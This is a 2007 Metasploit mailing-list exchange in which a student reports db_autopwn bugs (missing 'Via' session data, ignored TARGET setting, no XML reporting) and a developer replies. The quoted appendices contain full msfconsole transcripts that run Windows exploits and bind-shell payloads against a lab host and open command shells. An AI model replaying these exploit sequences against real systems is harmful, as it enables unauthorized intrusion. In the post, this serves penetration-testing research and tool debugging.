Autopwn question [+generating Reports]

[mmiller at hick.org (mmiller at hick.org)]

The via exploit not being set is most likely a bug.  I'll try to look
into that.  It should be set in all contexts.

At present, I don't think we have a method to serialize the contents of
the database to XML.  We had talked about doing this at one point,
though.

As far as I'm aware, the global datastore will not be consulted for
automated attacks from db_autopwn.  I think only exploits with default
targets will function correctly.  HD can correct me if I'm wrong.

On Wed, Feb 07, 2007 at 11:12:42PM +0100, Dennis G?nnewig wrote:
> Hi skape,
>
> i played around with db_autopwn till today and was faced with a quite
> strange behaviour:
>
> The way you described works quite fine.
> short:
> ======
> use <exploit>
> set <variable>
> exploit -z
> sessions -l -v
>
> long:
> ======
> appendix [1]
>
>
> But if i do it the following way, the via-information is missing.
>
> short:
> =======
> load db_mysql
> db_connect user:password at localhost/msf1
> db_autopwn -e -p
> sessions -l -v
>
> long:
> =====
> appendix [2]
>
> i got only
>
> |   Id  Description    Tunnel                                     Via
> |   --  -----------    ------                                     ---
> |   1   Command shell  192.168.111.1:3304 -> 192.168.111.12:7465
> |   2   Command shell  192.168.111.1:2911 -> 192.168.111.12:7308
>
> Is this a built-in barrier against script kiddies or actually a not wanted behaviour?
>
> I searched for helping files with strace ("strace -p <pid> (-e trace=file) -o ./strace_file.out 
> /metasploit/msfconsole" + "msf>
> sessions -l -v") and lsof (lsof | grep /metas), but didn't find nothing suitable.
>
> While searching API-documentation for suitable variables, I found set_via(), but without any working ruby-ide and 
> running out of
> time for my semester thesis I decided to ask the mailing list.
>
> ===
>
> Furthermore are there any interfaces to take the output (scanned host(s), the scanned ports, the exploits which were 
> able to
> create sessions, the time the systems were scanned etc) to generate a xml-report?
>
> And what do you think, how much time it would take for a programmer who is familiar with ruby and the msf to get such 
> an extension
> of the msf working?
>
> ===
>
> Another strange behaviour I found, when starting db_autopwn -e -p: Setting TARGET to 3 seems not to have any effect 
> on exploits
> excuted by db_autopwn. Is this a problem between my ears ;), a wanted feature or to be leaded back to the beta status 
> of the msf?
>
> Maybe it would be better to allow TARGET to be a normal string or an integer as Windows XP SP1 Eng can be a "2" in 
> the context of
> one exploit (see [3]) and a "3" in another (see [4])
>
> Best regards,
> dennis
>
>
> Appendix:
>
> (1)===============================================
> ==================================================
> | msf> use windows/tftp/tftpd32_long_filename
> | msf exploit(tftpd32_long_filename)> set
> |
> | Global
> | ======
> |
> |   Name     Value
> |   ----     -----
> |   PAYLOAD  windows/shell/bind_tcp
> |   RHOST    192.168.111.12
> |   RPORT    69
> |
> | Module: windows/tftp/tftpd32_long_filename
> | ==========================================
> |
> |   Name      Value
> |   ----      -----
> |   EXITFUNC  process
> |   RPORT     69
> |   TARGET    3
> |   WfsDelay  0
> |
> | msf exploit(tftpd32_long_filename)> exploit -z
> | [...]
> | msf exploit(tftpd32_long_filename)> sessions -l -v
> |     or
> | msf > sessions -l -v
> |
> | Active sessions
> | ===============
> |
> |   Id  Description    Tunnel                                     Via
> |   --  -----------    ------                                     ---
> |   1   Command shell  192.168.111.1:1502 -> 192.168.111.12:4444  windows/tftp/tftpd32_long_filename
>
>
>
>
> (2)===============================================
> ==================================================
> | msf > load db_mysql
> | [*] Successfully loaded plugin: db_mysql
> | msf > db_connect user:password at localhost/msf1
> | msf > db_hosts
> | [*] Host: 192.168.111.12
> | msf > db_services
> | [*] Service: host=192.168.111.12 port=22 proto=tcp state=up name=ssh
> | [*] Service: host=192.168.111.12 port=135 proto=tcp state=up name=msrpc
> | [*] Service: host=192.168.111.12 port=139 proto=tcp state=up name=netbios-ssn
> | [*] Service: host=192.168.111.12 port=445 proto=tcp state=up name=microsoft-ds
> | [*] Service: host=192.168.111.12 port=1025 proto=tcp state=up name=msrpc
> | [*] Service: host=192.168.111.12 port=3389 proto=tcp state=up name=microsoft-rdp
> | [*] Service: host=192.168.111.12 port=5000 proto=tcp state=up name=upnp
> | [*] Service: host=192.168.111.12 port=5800 proto=tcp state=up name=vnc-http
> | [*] Service: host=192.168.111.12 port=5900 proto=tcp state=up name=vnc
> | [*] Service: host=192.168.111.12 port=123 proto=udp state=up name=ntp
> | [*] Service: host=192.168.111.12 port=135 proto=udp state=up name=msrpc
> | msf > db_add_
> | db_add_host  db_add_port
> | msf > db_add_port
> | [*] Usage: db_add_port [host] [port] [proto]
> | msf > db_add_port 192.168.111.12 69 udp
> | [*] Service: host=192.168.111.12 port=69 proto=udp state=up
> |
> | msf > setg TARGET 3
> | TARGET => 3
> | msf > setg
> |
> | Global
> | ======
> |
> |   Name     Value
> |   ----     -----
> |   PAYLOAD  windows/shell/bind_tcp
> |   RHOST    192.168.111.12
> |   RHOSTS   192.168.111.0/24
> |   RPORT    69
> |   TARGET   3
> | msf > db_autopwn -e -p
> | [*] Launching exploit/windows/tftp/tftpd32_long_filename (4/76) against 192.168.111.12:69...
> | [*]  >> Exception during launch from exploit/windows/tftp/tftpd32_long_filename: A target has not been selected.
> | [*] Launching exploit/windows/smb/ms06_066_nwwks (6/76) against 192.168.111.12:445...
> | [*] Started bind handler
> | [*] Connecting to the SMB service...
> | [*] Binding to e67ab081-9844-3521-9d32-834f038001c0:1.0 at ncacn_np:192.168.111.12[\nwwks] ...
> | [*] Launching exploit/windows/tftp/threectftpsvc_long_mode (15/76) against 192.168.111.12:69...
> | [*] Started bind handler
> | [*] Trying target 3CTftpSvc 2.0.1...
> | [*] Launching exploit/windows/ssl/ms04_011_pct (17/76) against 192.168.111.12:69...
> | [*] Started bind handler
> |
> | [...]
> |
> | msf > sessions -l -v
> |
> | Active sessions
> | ===============
> |
> |   Id  Description    Tunnel                                     Via
> |   --  -----------    ------                                     ---
> |   1   Command shell  192.168.111.1:3304 -> 192.168.111.12:7465
> |   2   Command shell  192.168.111.1:2911 -> 192.168.111.12:7308
>
>
>
> (3)===============================================
> ==================================================
> msf exploit(freesshd_key_exchange) > show targets
>
> Exploit targets:
>
>    Id  Name
>    --  ----
>    0   Windows 2000 Pro SP4 English
>    1   Windows XP Pro SP0 English
>    2   Windows XP Pro SP1 English
>
>
>
>
> (4)===============================================
> ==================================================
> msf exploit(tftpd32_long_filename) > show targets
>
> Exploit targets:
>
>    Id  Name
>    --  ----
>    0   Windows NT 4.0 SP6a English
>    1   Windows 2000 Pro SP4 English
>    2   Windows XP Pro SP0 English
>    3   Windows XP Pro SP1 English